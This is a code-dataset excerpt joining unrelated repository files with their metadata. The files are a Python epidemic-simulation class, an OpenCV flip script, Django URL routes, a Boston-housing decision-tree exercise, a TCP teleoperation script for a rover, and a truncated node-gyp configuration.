2.3375000000000004, 2.341071428571429, 2.3446428571428575, 2.348214285714286, 2.3517857142857146, 2.355357142857143, 2.3589285714285717, 2.3625000000000003, 2.366071428571429, 2.3696428571428574, 2.373214285714286, 2.3767857142857145, 2.380357142857143, 2.3839285714285716, 2.3875, 2.3910714285714287, 2.3946428571428573, 2.398214285714286, 2.4017857142857144, 2.405357142857143, 2.4089285714285715, 2.4125, 2.4160714285714286, 2.419642857142857, 2.4232142857142858, 2.4267857142857143, 2.430357142857143, 2.4339285714285714, 2.4375, 2.4410714285714286, 2.444642857142857, 2.4482142857142857, 2.4517857142857142, 2.455357142857143, 2.4589285714285714, 2.4625000000000004, 2.466071428571429, 2.4696428571428575, 2.473214285714286, 2.4767857142857146, 2.480357142857143, 2.4839285714285717, 2.4875000000000003, 2.491071428571429, 2.4946428571428574, 2.498214285714286, 2.5017857142857145, 2.505357142857143, 2.5089285714285716, 2.5125, 2.5160714285714287, 2.5196428571428573, 2.523214285714286, 2.5267857142857144, 2.530357142857143, 2.5339285714285715, 2.5375, 2.5410714285714286, 2.544642857142857, 2.5482142857142858, 2.5517857142857143, 2.555357142857143, 2.5589285714285714, 2.5625, 2.5660714285714286, 2.569642857142857, 2.5732142857142857, 2.5767857142857142, 2.580357142857143, 2.5839285714285714, 2.5875000000000004, 2.591071428571429, 2.5946428571428575, 2.598214285714286, 2.6017857142857146, 2.605357142857143, 2.6089285714285717, 2.6125000000000003, 2.616071428571429, 2.6196428571428574, 2.623214285714286, 2.6267857142857145, 2.630357142857143, 2.6339285714285716, 2.6375, 2.6410714285714287, 2.6446428571428573, 2.648214285714286, 2.6517857142857144, 2.655357142857143, 2.6589285714285715, 2.6625, 2.6660714285714286, 2.669642857142857, 2.6732142857142858, 2.6767857142857143, 2.680357142857143, 2.6839285714285714, 2.6875, 2.6910714285714286, 2.694642857142857, 2.6982142857142857, 2.7017857142857142, 2.705357142857143, 2.7089285714285714, 2.7125, 2.716071428571429, 2.7196428571428575, 2.723214285714286, 2.7267857142857146, 2.730357142857143, 2.7339285714285717, 2.7375000000000003, 2.741071428571429, 2.7446428571428574, 2.748214285714286, 2.7517857142857145, 2.755357142857143, 2.7589285714285716, 2.7625, 2.7660714285714287, 2.7696428571428573, 2.773214285714286, 2.7767857142857144, 2.780357142857143, 2.7839285714285715, 2.7875, 2.7910714285714286, 2.794642857142857, 2.7982142857142858, 2.8017857142857143, 2.805357142857143, 2.8089285714285714, 2.8125, 2.8160714285714286, 2.819642857142857, 2.8232142857142857, 2.8267857142857142, 2.830357142857143, 2.8339285714285714, 2.8375, 2.841071428571429, 2.8446428571428575, 2.848214285714286, 2.8517857142857146, 2.855357142857143, 2.8589285714285717, 2.8625000000000003, 2.866071428571429, 2.8696428571428574, 2.873214285714286, 2.8767857142857145, 2.880357142857143, 2.8839285714285716, 2.8875, 2.8910714285714287, 2.8946428571428573, 2.898214285714286, 2.9017857142857144, 2.905357142857143, 2.9089285714285715, 2.9125, 2.9160714285714286, 2.919642857142857, 2.9232142857142858, 2.9267857142857143, 2.930357142857143, 2.9339285714285714, 2.9375, 2.9410714285714286, 2.944642857142857, 2.9482142857142857, 2.9517857142857142, 2.955357142857143, 2.9589285714285714, 2.9625, 2.966071428571429, 2.9696428571428575, 2.973214285714286, 2.9767857142857146, 2.980357142857143, 2.9839285714285717, 2.9875000000000003, 2.991071428571429, 2.9946428571428574, 2.998214285714286, 3.0017857142857145, 3.005357142857143, 3.0089285714285716, 3.0125, 3.0160714285714287, 3.0196428571428573, 3.023214285714286, 3.0267857142857144, 3.030357142857143, 3.0339285714285715, 3.0375, 3.0410714285714286, 3.044642857142857, 3.0482142857142858, 3.0517857142857143, 3.055357142857143, 3.0589285714285714, 3.0625, 3.0660714285714286, 3.069642857142857, 3.0732142857142857, 3.0767857142857142, 3.080357142857143, 3.0839285714285714, 3.0875, 3.0910714285714285, 3.0946428571428575, 3.098214285714286, 3.1017857142857146, 3.105357142857143, 3.1089285714285717, 3.1125000000000003, 3.116071428571429, 3.1196428571428574, 3.123214285714286, 3.1267857142857145, 3.130357142857143, 3.1339285714285716, 3.1375, 3.1410714285714287, 3.1446428571428573, 3.148214285714286, 3.1517857142857144, 3.155357142857143, 3.1589285714285715, 3.1625, 3.1660714285714286, 3.169642857142857, 3.1732142857142858, 3.1767857142857143, 3.180357142857143, 3.1839285714285714, 3.1875, 3.1910714285714286, 3.194642857142857, 3.1982142857142857, 3.2017857142857142, 3.205357142857143, 3.2089285714285714, 3.2125, 3.2160714285714285, 3.2196428571428575, 3.223214285714286, 3.2267857142857146, 3.230357142857143, 3.2339285714285717, 3.2375000000000003, 3.241071428571429, 3.2446428571428574, 3.248214285714286, 3.2517857142857145, 3.255357142857143, 3.2589285714285716, 3.2625, 3.2660714285714287, 3.2696428571428573, 3.273214285714286, 3.2767857142857144, 3.280357142857143, 3.2839285714285715, 3.2875, 3.2910714285714286, 3.294642857142857, 3.2982142857142858, 3.3017857142857143, 3.305357142857143, 3.3089285714285714, 3.3125, 3.3160714285714286, 3.319642857142857, 3.3232142857142857, 3.3267857142857142, 3.330357142857143, 3.3339285714285714, 3.3375, 3.3410714285714285, 3.3446428571428575, 3.348214285714286, 3.3517857142857146, 3.355357142857143, 3.3589285714285717, 3.3625000000000003, 3.366071428571429, 3.3696428571428574, 3.373214285714286, 3.3767857142857145, 3.380357142857143, 3.3839285714285716, 3.3875, 3.3910714285714287, 3.3946428571428573, 3.398214285714286, 3.4017857142857144, 3.405357142857143, 3.4089285714285715, 3.4125, 3.4160714285714286, 3.419642857142857, 3.4232142857142858, 3.4267857142857143, 3.430357142857143, 3.4339285714285714, 3.4375, 3.4410714285714286, 3.444642857142857, 3.4482142857142857, 3.4517857142857142, 3.455357142857143, 3.4589285714285714, 3.4625, 3.4660714285714285, 3.469642857142857, 3.473214285714286, 3.4767857142857146, 3.480357142857143, 3.4839285714285717, 3.4875000000000003, 3.491071428571429, 3.4946428571428574, 3.498214285714286, 3.5017857142857145, 3.505357142857143, 3.5089285714285716, 3.5125, 3.5160714285714287, 3.5196428571428573, 3.523214285714286, 3.5267857142857144, 3.530357142857143, 3.5339285714285715, 3.5375, 3.5410714285714286, 3.544642857142857, 3.5482142857142858, 3.5517857142857143, 3.555357142857143, 3.5589285714285714, 3.5625, 3.5660714285714286, 3.569642857142857, 3.5732142857142857, 3.5767857142857142, 3.580357142857143, 3.5839285714285714, 3.5875, 3.5910714285714285, 3.594642857142857, 3.598214285714286, 3.6017857142857146, 3.605357142857143, 3.6089285714285717, 3.6125000000000003, 3.616071428571429, 3.6196428571428574, 3.623214285714286, 3.6267857142857145, 3.630357142857143, 3.6339285714285716, 3.6375, 3.6410714285714287, 3.6446428571428573, 3.648214285714286, 3.6517857142857144, 3.655357142857143, 3.6589285714285715, 3.6625, 3.6660714285714286, 3.669642857142857, 3.6732142857142858, 3.6767857142857143, 3.680357142857143, 3.6839285714285714, 3.6875, 3.6910714285714286, 3.694642857142857, 3.6982142857142857, 3.7017857142857142, 3.705357142857143, 3.7089285714285714, 3.7125, 3.7160714285714285, 3.719642857142857, 3.723214285714286, 3.7267857142857146, 3.730357142857143, 3.7339285714285717, 3.7375000000000003, 3.741071428571429, 3.7446428571428574, 3.748214285714286, 3.7517857142857145, 3.755357142857143, 3.7589285714285716, 3.7625, 3.7660714285714287, 3.7696428571428573, 3.773214285714286, 3.7767857142857144, 3.780357142857143, 3.7839285714285715, 3.7875, 3.7910714285714286, 3.794642857142857, 3.7982142857142858, 3.8017857142857143, 3.805357142857143, 3.8089285714285714, 3.8125, 3.8160714285714286, 3.819642857142857, 3.8232142857142857, 3.8267857142857142, 3.830357142857143, 3.8339285714285714, 3.8375, 3.8410714285714285, 3.844642857142857, 3.848214285714286, 3.8517857142857146, 3.855357142857143, 3.8589285714285717, 3.8625000000000003, 3.866071428571429, 3.8696428571428574, 3.873214285714286, 3.8767857142857145, 3.880357142857143, 3.8839285714285716, 3.8875, 3.8910714285714287, 3.8946428571428573, 3.898214285714286, 3.9017857142857144, 3.905357142857143, 3.9089285714285715, 3.9125, 3.9160714285714286, 3.919642857142857, 3.9232142857142858, 3.9267857142857143, 3.930357142857143, 3.9339285714285714, 3.9375, 3.9410714285714286, 3.944642857142857, 3.9482142857142857, 3.9517857142857142, 3.955357142857143, 3.9589285714285714, 3.9625, 3.9660714285714285, 3.969642857142857, 3.9732142857142856, 3.9767857142857146, 3.980357142857143, 3.9839285714285717, 3.9875000000000003, 3.991071428571429, 3.9946428571428574, 3.998214285714286, 4.001785714285714, 4.005357142857142, 4.008928571428571, 4.012499999999999, 4.016071428571428, 4.019642857142856, 4.023214285714285, 4.0267857142857135, 4.0303571428571425, 4.033928571428571, 4.0375, 4.041071428571429, 4.044642857142857, 4.048214285714286, 4.051785714285714, 4.055357142857143, 4.058928571428571, 4.0625, 4.066071428571428, 4.069642857142857, 4.073214285714285, 4.076785714285714, 4.080357142857142, 4.083928571428571, 4.0874999999999995, 4.0910714285714285, 4.094642857142857, 4.098214285714286, 4.101785714285714, 4.105357142857143, 4.108928571428571, 4.1125, 4.116071428571428, 4.119642857142857, 4.123214285714285, 4.126785714285714, 4.130357142857142, 4.133928571428571, 4.137499999999999, 4.141071428571428, 4.144642857142856, 4.148214285714285, 4.1517857142857135, 4.1553571428571425, 4.158928571428571, 4.1625, 4.166071428571429, 4.169642857142857, 4.173214285714286, 4.176785714285714, 4.180357142857143, 4.183928571428571, 4.1875, 4.191071428571428, 4.194642857142857, 4.198214285714285, 4.201785714285714, 4.205357142857142, 4.208928571428571, 4.2124999999999995, 4.2160714285714285, 4.219642857142857, 4.223214285714286, 4.226785714285714, 4.230357142857143, 4.233928571428571, 4.2375, 4.241071428571428, 4.244642857142857, 4.248214285714285, 4.251785714285714, 4.255357142857142, 4.258928571428571, 4.262499999999999, 4.266071428571428, 4.269642857142856, 4.273214285714285, 4.2767857142857135, 4.2803571428571425, 4.283928571428571, 4.2875, 4.291071428571429, 4.294642857142857, 4.298214285714286, 4.301785714285714, 4.305357142857143, 4.308928571428571, 4.3125, 4.316071428571428, 4.319642857142857, 4.323214285714285, 4.326785714285714, 4.330357142857142, 4.333928571428571, 4.3374999999999995, 4.3410714285714285, 4.344642857142857, 4.348214285714286, 4.351785714285714, 4.355357142857143, 4.358928571428571, 4.3625, 4.366071428571428, 4.369642857142857, 4.373214285714285, 4.376785714285714, 4.380357142857142, 4.383928571428571, 4.387499999999999, 4.391071428571428, 4.394642857142856, 4.398214285714285, 4.4017857142857135, 4.4053571428571425, 4.408928571428571, 4.4125, 4.416071428571429, 4.419642857142857, 4.423214285714286, 4.426785714285714, 4.430357142857143, 4.433928571428571, 4.4375, 4.441071428571428, 4.444642857142857, 4.448214285714285, 4.451785714285714, 4.455357142857142, 4.458928571428571, 4.4624999999999995, 4.4660714285714285, 4.469642857142857, 4.473214285714286, 4.476785714285714, 4.480357142857143, 4.483928571428571, 4.4875, 4.491071428571428, 4.494642857142857, 4.498214285714285, 4.501785714285714, 4.505357142857142, 4.508928571428571, 4.512499999999999, 4.516071428571428, 4.519642857142856, 4.523214285714285, 4.5267857142857135, 4.5303571428571425, 4.533928571428571, 4.5375, 4.541071428571428, 4.544642857142857, 4.548214285714286, 4.551785714285714, 4.555357142857143, 4.558928571428571, 4.5625, 4.566071428571428, 4.569642857142857, 4.573214285714285, 4.576785714285714, 4.580357142857142, 4.583928571428571, 4.5874999999999995, 4.5910714285714285, 4.594642857142857, 4.598214285714286, 4.601785714285714, 4.605357142857143, 4.608928571428571, 4.6125, 4.616071428571428, 4.619642857142857, 4.623214285714285, 4.626785714285714, 4.630357142857142, 4.633928571428571, 4.637499999999999, 4.641071428571428, 4.644642857142856, 4.648214285714285, 4.6517857142857135, 4.6553571428571425, 4.658928571428571, 4.6625, 4.666071428571428, 4.669642857142857, 4.673214285714286, 4.676785714285714, 4.680357142857143, 4.683928571428571, 4.6875, 4.691071428571428, 4.694642857142857, 4.698214285714285, 4.701785714285714, 4.705357142857142, 4.708928571428571, 4.7124999999999995, 4.7160714285714285, 4.719642857142857, 4.723214285714286, 4.726785714285714, 4.730357142857143, 4.733928571428571, 4.7375, 4.741071428571428, 4.744642857142857, 4.748214285714285, 4.751785714285714, 4.755357142857142, 4.758928571428571, 4.762499999999999, 4.766071428571428, 4.769642857142856, 4.773214285714285, 4.7767857142857135, 4.7803571428571425, 4.783928571428571, 4.7875, 4.791071428571428, 4.794642857142857, 4.798214285714286, 4.801785714285714, 4.805357142857143, 4.808928571428571, 4.8125, 4.816071428571428, 4.819642857142857, 4.823214285714285, 4.826785714285714, 4.830357142857142, 4.833928571428571, 4.8374999999999995, 4.8410714285714285, 4.844642857142857, 4.848214285714286, 4.851785714285714, 4.855357142857143, 4.858928571428571, 4.8625, 4.866071428571428, 4.869642857142857, 4.873214285714285, 4.876785714285714, 4.880357142857142, 4.883928571428571, 4.887499999999999, 4.891071428571428, 4.894642857142856, 4.898214285714285, 4.9017857142857135, 4.9053571428571425, 4.908928571428571, 4.9125, 4.916071428571428, 4.919642857142857, 4.923214285714286, 4.926785714285714, 4.930357142857143, 4.933928571428571, 4.9375, 4.941071428571428, 4.944642857142857, 4.948214285714285, 4.951785714285714, 4.955357142857142, 4.958928571428571, 4.9624999999999995, 4.9660714285714285, 4.969642857142857, 4.973214285714286, 4.976785714285714, 4.980357142857143, 4.983928571428571, 4.9875, 4.991071428571428, 4.994642857142857, 4.998214285714285]
|
[
"rgarg@cern.ch"
] |
rgarg@cern.ch
|
0283e43ce1b3b31585f53812085b759b79811cc6
|
5182897b2f107f4fd919af59c6762d66c9be5f1d
|
/.history/src/Individuo_20200710164705.py
|
ffc91aee5f741018ab08a59df5c8052c8ae54c56
|
[
"MIT"
] |
permissive
|
eduardodut/Trabalho_final_estatistica_cd
|
422b7e702f96291f522bcc68d2e961d80d328c14
|
fbedbbea6bdd7a79e1d62030cde0fab4e93fc338
|
refs/heads/master
| 2022-11-23T03:14:05.493054
| 2020-07-16T23:49:26
| 2020-07-16T23:49:26
| 277,867,096
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,332
|
py
|
import random
class Individuo():
SADIO = 0
INFECTADO_TIPO_1 = 1 #assintomรกticos e o infectado inicial
INFECTADO_TIPO_2 = 2 #sintomรกtico
CURADO = 3
MORTO = 4
def __init__(
self,
status,
atualizacoes_cura,
posicao):
self.status = status
self.atualizacoes_cura = atualizacoes_cura
self.posicao = posicao
def __repr__(self):
return string(self.status)
def infectar(self, chance_infeccao, chance_infeccao_tipo2):
saida = Individuo.SADIO
if (self.status == Individuo.INFECTADO_TIPO_2 or self.status == Individuo.INFECTADO_TIPO_1):
#nรบmero aleatรณrio para chance de infectar o vizinho
rng_infeccao = random.random()
if rng_infeccao <= chance_infeccao:
#nรบmero aleatรณrio para chance de infecรงรฃo tipo 1 ou 2
rng_infeccao_tipo2 = random.random()
if rng_infeccao_tipo2 <= chance_infeccao_tipo2:
saida = Individuo.INFECTADO_TIPO_2
else:
saida = Individuo.INFECTADO_TIPO_1
return saida
def checagem_morte(self, chance_morte):
if self.status == Individuo.INFECTADO_TIPO_2:
rng_morte = random.random()
if rng_morte <= chance_morte:
self.status = Individuo.MORTO
return self.status
return self.checagem_cura()
def checagem_cura(self):
if self.status == Individuo.INFECTADO_TIPO_2 or self.status == Individuo.INFECTADO_TIPO_1:
self.atualizacoes_cura = self.atualizacoes_cura - 1
if self.atualizacoes_cura == 0:
self.status = Individuo.CURADO
return self.status
class Fabrica_individuo():
def __init__(
self,
atualizacoes_cura): #nรบmero de atualizaรงรตes necessรกrias para a cura de um indivรญduo tipo 1 ou 2
self.atualizacoes_cura = atualizacoes_cura
def criar_individuo(self, status_inicial, posicao):
return Individuo(
status_inicial,
self.atualizacoes_cura,
posicao)
|
[
"eduardo_dut@edu.unifor.br"
] |
eduardo_dut@edu.unifor.br
|
986c67916f48b5aa8885b21b81790c29d362e926
|
861ba53ac6451da5ebd827f47dbe3003453959d0
|
/flip_img.py
|
19bd4924d2de3cac8af69100adcb57d8b2ec0b3b
|
[] |
no_license
|
puru07/opencv_work
|
97de2456ec6059815ac449debdb102907acea7a3
|
dc3e33c019509fe46d7cc66461584f761db7dd38
|
refs/heads/master
| 2020-05-25T15:41:39.391002
| 2017-04-26T00:19:02
| 2017-04-26T00:19:02
| 70,036,744
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 265
|
py
|
import numpy as np
import cv2
img=cv2.imread('1.png')
rimg=img.copy()
fimg=img.copy()
rimg=cv2.flip(img,1)
fimg=cv2.flip(img,0)
cv2.imshow("Original", img)
cv2.imshow("vertical flip", rimg)
cv2.imshow("horizontal flip", fimg)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"pururastogi@gmail.com"
] |
pururastogi@gmail.com
|
19f8187d93bb10f927d848281bb4a5f8e3453b84
|
f5745bb0b7cabdb67840fe4b7326203e99917844
|
/weather_app/main/urls.py
|
a69971e9e5c92f4a93e0c7363a0ed8fdeaa37407
|
[] |
no_license
|
oluwakayode-a/Django-Weather-App
|
f927ff4ea511603289d808eddbdbbe7271504178
|
a2cebce388c69eb60cc0b422db12894f18df7288
|
refs/heads/master
| 2020-07-09T15:44:04.390546
| 2019-08-27T07:05:31
| 2019-08-27T07:05:31
| 204,013,324
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name="index"),
path('get_weather', views.get_weather, name='get_weather')
]
|
[
"khaox07@gmail.com"
] |
khaox07@gmail.com
|
12b006e6c4928d647c1a85d07b6fdc1ebf6d9561
|
c51cd17622d2a070bc18b6a989ba20553786ad4f
|
/predict_price.py
|
4503dc7853c030e55dca678c431997c7b0a95ce7
|
[] |
no_license
|
botezatpv/Boston_Housing_PythonML
|
9de2d2eb33a5237dd68ff983a18782946b5f9cc1
|
3de686d48d4a017a3f8cde4a40af2d269d45ee89
|
refs/heads/master
| 2021-01-19T03:42:25.318288
| 2016-08-04T16:20:10
| 2016-08-04T16:20:10
| 64,949,377
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,053
|
py
|
๏ปฟ"""Load the Boston dataset and examine its target (label) distribution."""
# Load libraries
import numpy as np
import pylab as pl
from sklearn import datasets, grid_search
from sklearn.tree import DecisionTreeRegressor
################################
### ADD EXTRA LIBRARIES HERE ###
from sklearn import metrics
from sklearn.cross_validation import train_test_split
from sklearn.svm import SVC
import random
################################
def load_data():
"""Load the Boston dataset."""
boston = datasets.load_boston()
return boston
def explore_city_data(city_data):
"""Calculate the Boston housing statistics."""
# Get the labels and features from the housing data
housing_prices = city_data.target
housing_features = city_data.data
###################################
### Step 1. YOUR CODE GOES HERE ###
print 'sizeOf_housing_prices', np.size(housing_prices)
print 'sizeOf_housing_features', np.size(housing_features)
print 'numberOfFeatures_housing_prices',np.ndim(housing_prices)
print 'numberOfFeatures_housing_features',np.ndim(housing_features)
print 'min_housing_prices',np.min(housing_prices)
print 'min_housing_features',np.min(housing_features)
print 'max_housing_prices',np.max(housing_prices)
print 'max_housing_features',np.max(housing_features)
print 'mean_housing_prices',np.mean(housing_prices)
print 'mean_housing_features',np.mean(housing_features)
print 'median_housing_prices',np.median(housing_prices)
print 'median_housing_features',np.median(housing_features)
print 'std_housing_prices',np.std(housing_prices)
print 'std_housing_features',np.std(housing_features)
return np.size(housing_prices), np.ndim(housing_prices), np.min(housing_prices), np.max(housing_prices), np.mean(housing_prices), np.median(housing_prices), np.std(housing_prices)
###################################
# Please calculate the following values using the Numpy library
# Size of data?
# Number of features?
# Minimum value?
# Maximum Value?
# Calculate mean?
# Calculate median?
# Calculate standard deviation?
def performance_metric(label, prediction):
"""Calculate and return the appropriate performance metric."""
###################################
### Step 2. YOUR CODE GOES HERE ###
#return metrics.mean_absolute_error(label, prediction)
return metrics.mean_squared_error(label, prediction)
###################################
# http://scikit-learn.org/stable/modules/classes.html#sklearn-metrics-metrics
def split_data(city_data):
"""Randomly shuffle the sample set. Divide it into training and testing set."""
# Get the features and labels from the Boston housing data
X, y = city_data.data, city_data.target
###################################
### Step 3. YOUR CODE GOES HERE ###
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.4, random_state = 121)
###################################
return X_train, y_train, X_test, y_test
def learning_curve(depth, X_train, y_train, X_test, y_test):
"""Calculate the performance of the model after a set of training data."""
# We will vary the training set size so that we have 50 different sizes
sizes = np.linspace(1, len(X_train), 50)
train_err = np.zeros(len(sizes))
test_err = np.zeros(len(sizes))
print "Decision Tree with Max Depth: "
print depth
for i, s in enumerate(sizes):
# Create and fit the decision tree regressor model
regressor = DecisionTreeRegressor(max_depth=depth)
regressor.fit(X_train[:s], y_train[:s])
# Find the performance on the training and testing set
train_err[i] = performance_metric(y_train[:s], regressor.predict(X_train[:s]))
test_err[i] = performance_metric(y_test, regressor.predict(X_test))
# Plot learning curve graph
learning_curve_graph(sizes, train_err, test_err)
def learning_curve_graph(sizes, train_err, test_err):
"""Plot training and test error as a function of the training size."""
pl.figure()
pl.title('Decision Trees: Performance vs Training Size')
pl.plot(sizes, test_err, lw=2, label = 'test error')
pl.plot(sizes, train_err, lw=2, label = 'training error')
pl.legend()
pl.xlabel('Training Size')
pl.ylabel('Error')
pl.show()
def model_complexity(X_train, y_train, X_test, y_test):
"""Calculate the performance of the model as model complexity increases."""
print "Model Complexity: "
# We will vary the depth of decision trees from 2 to 25
max_depth = np.arange(1, 25)
train_err = np.zeros(len(max_depth))
test_err = np.zeros(len(max_depth))
for i, d in enumerate(max_depth):
# Setup a Decision Tree Regressor so that it learns a tree with depth d
regressor = DecisionTreeRegressor(max_depth=d)
# Fit the learner to the training data
regressor.fit(X_train, y_train)
# Find the performance on the training set
train_err[i] = performance_metric(y_train, regressor.predict(X_train))
# Find the performance on the testing set
test_err[i] = performance_metric(y_test, regressor.predict(X_test))
# Plot the model complexity graph
model_complexity_graph(max_depth, train_err, test_err)
def model_complexity_graph(max_depth, train_err, test_err):
"""Plot training and test error as a function of the depth of the decision tree learn."""
pl.figure()
pl.title('Decision Trees: Performance vs Max Depth')
pl.plot(max_depth, test_err, lw=2, label = 'test error')
pl.plot(max_depth, train_err, lw=2, label = 'training error')
pl.legend()
pl.xlabel('Max Depth')
pl.ylabel('Error')
pl.show()
def fit_predict_model(city_data):
"""Find and tune the optimal model. Make a prediction on housing data."""
# Get the features and labels from the Boston housing data
X, y = city_data.data, city_data.target
# Setup a Decision Tree Regressor
regressor = DecisionTreeRegressor()
parameters = {'max_depth':(1,2,3,4,5,6,7,8,9,10)}
###################################
### Step 4. YOUR CODE GOES HERE ###
score = metrics.make_scorer(performance_metric, greater_is_better = False)
reg = grid_search.GridSearchCV(regressor, parameters, scoring = score)
reg.fit(X, y)
print reg.best_params_
print reg.best_score_
###################################
# 1. Find the best performance metric
# should be the same as your performance_metric procedure
# http://scikit-learn.org/stable/modules/generated/sklearn.metrics.make_scorer.html
# 2. Use gridearch to fine tune the Decision Tree Regressor and find the
# best model
# http://scikit-learn.org/stable/modules/generated/sklearn.grid_search.GridSearchCV.html#sklearn.grid_search.GridSearchCV
# Fit the learner to the training data
#print "Final Model: "
# Use the model to predict the output of a particular sample
x = [11.95, 0.00, 18.100, 0, 0.6590, 5.6090, 90.00, 1.385, 24, 680.0, 20.20, 332.09, 12.13]
y = reg.predict(x)
print "House: " + str(x)
print "Prediction: " + str(y)
def main():
"""Analyze the Boston housing data. Evaluate and validate the
performanance of a Decision Tree regressor on the housing data.
Fine tune the model to make prediction on unseen data."""
# Load data
city_data = load_data()
# Explore the data
explore_city_data(city_data)
# Training/Test dataset split
X_train, y_train, X_test, y_test = split_data(city_data)
# Learning Curve Graphs
max_depths = [1,2,3,4,5,6,7,8,9,10]
for max_depth in max_depths:
learning_curve(max_depth, X_train, y_train, X_test, y_test)
# Model Complexity Graph
model_complexity(X_train, y_train, X_test, y_test)
# Tune and predict Model
fit_predict_model(city_data)
if __name__ == "__main__":
main()
|
[
"botezatpv@gmail.com"
] |
botezatpv@gmail.com
|
ac97a83825c0b8ba008191001b6326f46282b0a8
|
5647950a195e5474b8d8a21f34654d9fd7c6cd6b
|
/ControlStation/SimpleTeleOp.py
|
4c7845a5152c1361953c65c66d1871cda47e3a32
|
[
"MIT"
] |
permissive
|
buoyancy99/CalRover
|
38e389e0b9da647307334ca6cd8a64b87aa299f6
|
c25920b0e4e33e8b5912faeb8950970a61e93bfb
|
refs/heads/master
| 2020-04-22T13:50:08.127811
| 2018-05-23T17:28:33
| 2018-05-23T17:28:33
| 134,224,414
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,270
|
py
|
import socket
import cv2
import numpy as np
import sys
def nothing(x):
pass
TCP_IP = '107.77.75.66'
TCP_PORT = 5005
BUFFER_SIZE = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
# Create a black image, a window
img = np.zeros((300,512,3), np.uint8)
cv2.namedWindow('image')
# create trackbars for color change
cv2.createTrackbar('L','image', 64, 127 ,nothing)
cv2.createTrackbar('R','image', 64 , 127 ,nothing)
# create switch for ON/OFF functionality
switch = '0 : OFF \n1 : ON'
cv2.createTrackbar(switch, 'image', 0, 1,nothing)
while(1):
cv2.imshow('image',img)
k = cv2.waitKey(10) & 0xFF
if k == 27:
break
# get current positions of four trackbars
l = cv2.getTrackbarPos('L','image')
r = cv2.getTrackbarPos('R','image')
if l < 0:
l = 64
if r < 0:
r = 64
print (l, r)
switchvalue = cv2.getTrackbarPos(switch,'image')
if switchvalue == 0:
l = r = 64
message = ("#" + chr(l) + chr(r)).encode(("ascii"))
s.send(message)
#s.send(chr(l).encode("utf-8"))
#s.send(chr(r).encode("utf-8"))
#s.send(l.to_bytes(1, byteorder=sys.byteorder))
#s.send(r.to_bytes(1, byteorder=sys.byteorder))
cv2.destroyAllWindows()
s.close()
|
[
"mentalchen@gmail.com"
] |
mentalchen@gmail.com
|
a16f4ccd8b245bdbb8bf5ab9769f24f7a4c598e1
|
6fd3a7c98543145c107b6644b3fbad7775cd1b16
|
/hlf-deployment-prod/app/node_modules/node-expat/build/config.gypi
|
1cac7a26db45b82542b88b2c58fd31620b6e1f73
|
[
"MIT"
] |
permissive
|
genrich9d/GKProject
|
147b802ed58bf7e482712f86be454cb469adac9c
|
a0d1cbf0b968ee7c8fcadc0d8ddff19122fed90a
|
refs/heads/master
| 2023-03-18T02:41:10.943083
| 2020-04-22T13:50:29
| 2020-04-22T13:50:29
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,075
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_gyp_path": "tools/icu/icu-system.gyp",
"icu_small": "false",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "false",
"node_module_version": 57,
"node_no_browser_globals": "false",
"node_prefix": "/usr",
"node_release_urlbase": "",
"node_shared": "false",
"node_shared_cares": "true",
"node_shared_http_parser": "true",
"node_shared_libuv": "true",
"node_shared_nghttp2": "true",
"node_shared_openssl": "true",
"node_shared_zlib": "true",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "false",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "so.57",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "false",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/usr/include/nodejs",
"standalone_static_library": 1,
"cache_lock_stale": "60000",
"legacy_bundling": "",
"sign_git_tag": "",
"user_agent": "npm/3.5.2 node/v8.10.0 linux x64",
"always_auth": "",
"bin_links": "true",
"key": "",
"description": "true",
"fetch_retries": "2",
"heading": "npm",
"if_present": "",
"init_version": "1.0.0",
"user": "",
"force": "",
"only": "",
"cache_min": "10",
"init_license": "ISC",
"editor": "vi",
"rollback": "true",
"tag_version_prefix": "v",
"cache_max": "Infinity",
"userconfig": "/home/node1/.npmrc",
"engine_strict": "",
"init_author_name": "",
"init_author_url": "",
"tmp": "/tmp",
"depth": "Infinity",
"save_dev": "",
"usage": "",
"progress": "true",
"https_proxy": "",
"onload_script": "",
"rebuild_bundle": "true",
"save_bundle": "",
"shell": "/bin/bash",
"prefix": "/usr/local",
"dry_run": "",
"browser": "",
"cache_lock_wait": "10000",
"registry": "https://registry.npmjs.org/",
"save_optional": "",
"scope": "",
"searchopts": "",
"versions": "",
"cache": "/home/node1/.npm",
"global_style": "",
"ignore_scripts": "",
"searchsort": "name",
"version": "",
"local_address": "",
"viewer": "man",
"color": "true",
"fetch_retry_mintimeout": "10000",
"umask": "0022",
"fetch_retry_maxtimeout": "60000",
"message": "%s",
"ca": "",
"cert": "",
"global": "",
"link": "",
"access": "",
"also": "",
"save": "",
"unicode": "true",
"long": "",
"production": "",
"unsafe_perm": "true",
"node_version": "8.10.0",
"tag": "latest",
"git_tag_version": "true",
